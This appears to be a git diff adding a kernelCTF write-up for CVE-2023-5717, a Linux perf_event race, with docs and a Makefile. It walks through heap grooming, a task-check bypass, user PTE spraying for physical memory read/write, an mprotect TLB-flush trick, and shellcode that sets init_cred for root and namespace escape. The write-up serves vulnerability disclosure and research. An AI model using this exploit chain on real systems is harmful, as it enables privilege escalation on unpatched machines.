google · msh1307 · Feb 16, 2025 · Feb 22, 2025 · Feb 22, 2025 · Feb 22, 2025
diff --git a/pocs/linux/kernelctf/CVE-2023-5717_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-5717_mitigation/docs/exploit.md
@@ -0,0 +1,248 @@
+# CVE-2023-6931
+
+## Exploit Details
+
+Exploit demo for CVE-2023-5717. Flag: `kernelCTF{v1:mitigation-v3b-6.1.55:1732857935:6261f8f865bfa74724bdfdf5002d01c644f70ff6}`
+
+## Overview
+
+This vulnerability enables an out-of-bounds increment when a race condition is successfully triggered.
+On hardened systems, mitigations such as CONFIG_KMALLOC_SPLIT_VARSIZE increase exploitation complexity.
+To circumvent these defenses, I manipulated the buddy allocator to achieve controlled linear heap allocation.
+
+The diagram represents the hierarchy of perf_event groups when a process creates an event group and then forks a child process.
+1) Parent group (Inital state)
+- At the top, we have a group_leader, which is the leader of the parent event group.
+- The group_leader manages multiple sibling events, which are linked together.
+```
++-----------------+         +------------+
+| group_leader    |---------| sibling 1  |  <--- Siblings connected to group_leader
++-----------------+         +------------+
+```
+2) Child group (After forking)
+- When the process forks a child process, the event group is inherited by the child.
+- This creates a child event group, which consists of new events mirroring the parent group's structure.
+- The child event group also has a new group leader, which is the event corresponding to group_leader in the child process.
+```
++-----------------+         +------------+
+| group_leader    |---------| sibling 1  |  <--- Siblings connected to group_leader
++-----------------+         +------------+
+    |                           |      
++-----------+             +-----------+
+| child 1   |-------------| child 2   |  <--- Children connected to each parent & child group leader
++-----------+             +-----------+
+```
+
+## Race scenario
+### CPU0
+```c
+perf_read()
+  ctx = perf_event_ctx_lock(event);
+  - perf_read_group()
+      values = kzalloc(event->read_size, GFP_KERNEL); // [A]
+      mutex_lock(&leader->child_mutex);  // [B]
+      ret = __perf_read_group_add(leader, read_format, values);
+      list_for_each_entry(child, &leader->child_list, child_list) {
+        ret = __perf_read_group_add(child, read_format, values);
+      }
+      mutex_unlock(&leader->child_mutex);      
+  perf_event_ctx_unlock(event, ctx);
+```
+### CPU1
+```c
+perf_release()
+  ctx = perf_event_ctx_lock(event);
+  perf_remove_from_context(event, DETACH_GROUP|DETACH_DEAD); // [C]
+  perf_event_ctx_unlock(event, ctx); // [D]
+  mutex_lock(&event->child_mutex);  // [E]
+  list_for_each_entry(child, &event->child_list, child_list) {
+    perf_remove_from_context(child, DETACH_GROUP);
+  }
+```
+### Description
+If execution follows the sequence C -> D -> A -> B -> E, the vulnerability is triggered as follows:
+1) At C, the parent event is removed from its parent group, decrementing `group_leader->nr_siblings`, which represents the parent group's size.
+2) At A, `values` is allocated based on the value of `group_leader->nr_siblings`, which has now been reduced.
+3) At B, CPU 0 locks child_mutex, preventing CPU 1 from proceeding beyond E.
+4) At E, CPU 1 attempts to iterate through `event->child_list`, but it is blocked because CPU 0 holds the lock at B.
+5) Since the parent group's `child_list` is smaller than the child group's `child_list`, this leads to an out-of-bounds access on the heap, causing heap out-of-bounds.
+
+## Allocating Buffers via the Buddy Allocator
+In `perf_read_group()`, the allocated buffer size is determined by the number of active events.
+Here is a reliable way to inject new events into an existing group from another process.
+The `perf_event_open()` system call enforces a restriction that new events must belong to the same task as the group leader:
+```c
+SYSCALL_DEFINE5(perf_event_open,
+		struct perf_event_attr __user *, attr_uptr,
+		pid_t, pid, int, cpu, int, group_fd, unsigned long, flags)
+{
+    [...]
+    if (pid != -1 && !(flags & PERF_FLAG_PID_CGROUP)) {
+		task = find_lively_task_by_vpid(pid);
+		if (IS_ERR(task)) {
+			err = PTR_ERR(task);
+			goto err_group_fd;
+		}
+	}
+    [...]
+    event = perf_event_alloc(&attr, cpu, task, group_leader, NULL,
+				 NULL, NULL, cgroup_fd);
+    [...]
+    ctx = find_get_context(pmu, task, event);
+	if (IS_ERR(ctx)) {
+		err = PTR_ERR(ctx);
+		goto err_alloc;
+	}
+
+	/*
+	 * Look up the group leader (we will attach this event to it):
+	 */
+	if (group_leader) {
+        [...]
+        /*
+		 * Make sure we're both on the same task, or both
+		 * per-CPU events.
+		 */
+		if (group_leader->ctx->task != ctx->task)
+			goto err_context;
+        [...]
+    }
+    [...]
+}
+```
+The check:
+```c
+if (group_leader->ctx->task != ctx->task)
+    goto err_context
+```
+ensures that group_leader and the new event belong to the same task.
+
+The function `perf_event_context_sched_out()` is invoked by the task scheduler during context switches:
+```c
+static void perf_event_context_sched_out(struct task_struct *task, int ctxn,
+                                         struct task_struct *next)
+{
+  [...]
+		if (context_equiv(ctx, next_ctx)) {
+      [...]
+			WRITE_ONCE(ctx->task, next);
+			WRITE_ONCE(next_ctx->task, task);
+            [...]
+			RCU_INIT_POINTER(task->perf_event_ctxp[ctxn], next_ctx);
+			RCU_INIT_POINTER(next->perf_event_ctxp[ctxn], ctx);
+
+			do_switch = 0;
+
+			perf_event_sync_stat(ctx, next_ctx);
+		}
+  [...]
+}
+```
+This function swaps ctx between two tasks under the following conditions:
+
+```
+child task -> parent task (same event group)
+parent task -> child task (same event group)
+child task -> child task (same event group)
+```
+
+When we pin a child task to CPU0 and a parent task to CPU1, the ctx will no longer be swapped due to the absence of context switching between the two tasks.
+
+Initially, we create a child process that allocates 512 events.
+Due to `perf_event_context_sched_out()`, the child's ctx is likely to be swapped with the parent's ctx during context switching, making the child inherit the parent's ctx.
+
+```c
+pid = add_siblings_fork(group_leader, 512, 0); 
+if (pid == 0) {
+    ret = 1;
+    goto gg;
+}
+
+pid = add_siblings_fork(group_leader, 511, pid); // first child has the ownership
+if (pid == 0) { // context switching failure?
+    ret = 1;
+    goto gg;
+}
+```
+To satisfy the condition `group_leader->ctx->task == ctx->task`, we pass pid 0 (current child process) to `add_siblings_fork()`.
+Since the current child process' ctx was swapped with the parent's ctx and `group_leader->ctx` still belongs to the parent, the check is bypassed.
+Because the first child process now holds the parent's ctx, we must pass its pid when calling `add_siblings_fork()` again.
+
+## Arbitrary increment
+- Normally, a page fault increments a counter in the current process's ctx.
+- However, after swapping(`perf_event_context_sched_out()`), the child's page fault increments counters in the parent's ctx.
+- Pinning the parent and child to different CPUs prevents context reswaps, making the attack reliable.
+
+```c
+	pid_t child_pid = fork();
+    if (child_pid == 0) {  // child read, pinned to CPU_A
+        [...]
+        char *addr = (char *)mmap(NULL, 0x1000 * 0x80, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 
+        for (int i=0; i<0x80; i++){
+            ioctl(group_leader, PERF_EVENT_IOC_ENABLE, 0);
+            addr[0x1000 * i] = 0x41;   // trigger page faults
+            ioctl(group_leader, PERF_EVENT_IOC_DISABLE, 0);
+        }
+        [...]
+        remove_xattr("security.x12296_10", 1); // will be used for oob write
+        for (int _=0; _<32; _++) {
+            read(group_leader, buf, sizeof(buf));
+        }
+        remove_xattr("security.ssiphim", 1);
+        if (setxattr("/tmp/x1", "security.x12296_10", buf, 0x3008, 0) < 0) { // reclaim the buffer
+            perror("reclaim failed");
+            exit(EXIT_FAILURE);
+        }
+        [...]
+    }
+    else if (child_pid > 0) {
+        _pin_to_cpu(CPU_B);  // pinned to CPU_B
+        sched_yield(); 
+		[...]
+	}
+```
+
+## Arbitrary physical address Read/Write
+To extend the race window, we adapted some code from [kernelCTF writeup](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-4622_lts/docs/exploit.md).
+
+1) Spraying User PTEs Near pipe_buffer
+- First, we allocate a pipe_buffer and then allocate user pages.
+- By repeatedly accessing these user pages, we spray user page table entries (PTEs) close to the pipe_buffer in memory.
+
+2) Triggering the Vulnerability to Increment `pipe_buffer->page`
+- We trigger the vulnerability to increment `pipe_buffer->page`, effectively making it point to the user PTEs.
+- If the race condition is successful, we gain control over user PTEs and modify them as needed.
+
+3) Patching the int 0x80 Handler
+- Once we gain arbitrary memory read/write, we search for the int 0x80 handler and overwrite it with our shellcode.
+```c
+    swapgs
+    mov r12, QWORD PTR gs:0x20cc0
+    mov r14, [r12+0x248] 
+    sub r14, 0x1ec030   // r14 = kbase
+    mov r8, r14 
+
+    mov rdi, 1 
+    mov rax, r8 
+    add rax, 0x1bde50   
+
+    push r12
+    push r8
+    call rax     // find_task_by_vpid(1)
+    mov rbx, rax
+    pop r8
+    pop r12
+
+    mov rax, r8 
+    add rax, 0x2a76900
+    mov rdi, rax
+    mov [rbx+2104], rdi    // task_struct->ns_proxy = init_nsproxy
+    mov [r12+2104], rdi    // task_struct->ns_proxy = init_nsproxy
+
+    mov rax, r8 
+    add rax, 0x2a76b40
+    mov rdi, rax
+    mov [r12 + 2008], rdi   // task_struct->cred = init_cred
+    swapgs 
+    iretq
+```
diff --git a/pocs/linux/kernelctf/CVE-2023-5717_mitigation/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2023-5717_mitigation/docs/novel-techniques.md
@@ -0,0 +1,39 @@
+# Fast, Deterministic TLB Flushing for User PTE Exploits via mprotect()
+This technique exploits a method to forcibly flush the Translation Lookaside Buffer (TLB) when user PTEs are modified to read or write arbitrary physical addresses. Typically, one might allocate a large chunk of memory to provoke a TLB flush, but in low-memory conditions—where the OOM (Out-Of-Memory) killer might be triggered—this approach becomes infeasible. Our solution is to rapidly toggle page permissions with mprotect(), guaranteeing a TLB flush in a fast and consistent manner, even under memory pressure.
+
+- Eliminating Large Memory Allocations
+Instead of allocating huge memory regions to force a TLB flush (risky under OOM conditions), we rely solely on changing existing page permissions. This approach works even in tight memory scenarios where the OOM killer would otherwise prevent new allocations.
+
+- Fast and Consistent TLB Synchronization
+By toggling permissions (e.g., R -> RWX -> R), we trigger quick, targeted TLB invalidations. This ensures immediate visibility of any changes to physical memory mapped by the user PTE, vastly reducing the time required to search or exploit the memory region.
+
+## Technique Details
+User PTE Modification
+We manipulate user-space page table entries (PTEs) to point to arbitrary physical addresses, gaining direct read or write access to privileged memory content. However, these changes aren’t recognized unless the TLB is invalidated.
+
+The permission flip (mprotect(..., PROT_READ | PROT_WRITE | PROT_EXEC) -> PROT_READ -> back to RWX) forces a TLB flush in all typical Linux environments.
+This provides a reliable, universal mechanism to update TLB mappings without depending on unpredictable memory allocation behavior.
+Compatible with Low-Memory Scenarios
+
+```c
+for (int j=0; j<16; j++) {
+    mprotect(&spray_addr[ii][jj], 0x1000, PROT_EXEC | PROT_READ | PROT_WRITE);
+    if (j%8 == 0)
+        printf("data%d : %lx %lx\n", j, *(uint64_t *)(&spray_addr[ii][jj]), *(uint64_t *)(&spray_addr[ii][jj+0x9b0]));
+
+    if (*(uint64_t *)(&spray_addr[ii][jj+0x9b0]) == 0xc089f8010fca010fULL)
+    {
+        for (int x=0; x<sizeof(shellcode); x++)
+            spray_addr[ii][jj+0x9b0 + x] = shellcode[x]; 
+        goto found;
+    }
+    mprotect(&spray_addr[ii][jj], 0x1000, PROT_READ);
+    busy_wait(10000);
+
+}
+mprotect(&spray_addr[ii][jj], 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
+```
+
+Even if the system is close to running out of memory (risking OOM killer triggers), our technique remains viable.
+By avoiding huge allocations, we circumvent potential OOM kills, ensuring uninterrupted exploitation.
+High Speed, Minimal Overhead
diff --git a/pocs/linux/kernelctf/CVE-2023-5717_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-5717_mitigation/docs/vulnerability.md
@@ -0,0 +1,4 @@
+`perf_read_group()` allocates a buffer based on an event's `read_size`, which depends on the size of its `sibling_list`.
+If `perf_read_group()` is called when an event's `sibling_list` is smaller than its child's `sibling_list`, it may increment or write beyond the allocated buffer, leading to memory corruption.
+
+This bug was introduced in commit fa8c269353d5 ("perf/core: Invert perf_read_group() loops") in kernel 3.16 and was later fixed in commit 32671e3799ca ("perf: Disallow mis-matched inherited group reads").
diff --git a/pocs/linux/kernelctf/CVE-2023-5717_mitigation/exploit/mitigation-v3b-6.1.55/Makefile b/pocs/linux/kernelctf/CVE-2023-5717_mitigation/exploit/mitigation-v3b-6.1.55/Makefile
@@ -0,0 +1,8 @@
+exploit:
+	gcc -static -o exploit exploit.c
+
+run:
+	./exploit
+
+clean:
+	rm exploit
diff --git a/pocs/linux/kernelctf/CVE-2023-5717_mitigation/exploit/mitigation-v3b-6.1.55/exploit b/pocs/linux/kernelctf/CVE-2023-5717_mitigation/exploit/mitigation-v3b-6.1.55/exploit